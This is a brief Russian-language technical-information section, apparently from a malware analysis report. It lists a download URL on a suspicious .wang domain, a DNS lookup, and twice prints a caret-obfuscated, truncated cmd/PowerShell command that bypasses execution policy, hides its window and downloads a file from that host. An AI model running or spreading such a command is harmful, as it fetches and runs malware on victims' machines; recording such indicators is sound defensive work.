Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oW^ER^s^he^L^l.exe ^-Exec^U^T^IoN^P^Ol^iCY ^ByPasS -^nO^pr^o^File -WindOw^S^Ty^L^E ^hID^D^E^N^ (nE^w-O^b^jEct ^s^y^StEM^.^Ne^T^.^W^ebCLienT)^.Do^WN^load^file('http://transpori...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "P^oW^ER^s^he^L^l.exe ^-Exec^U^T^IoN^P^Ol^iCY ^ByPasS -^nO^pr^o^File -WindOw^S^Ty^L^E ^hID^D^E^N^ (nE^w-O^b^jEct ^s^y^StEM^.^Ne^T^.^W^ebCLienT)^.Do^WN^load^file('http://transpori...' (со скрытым окном)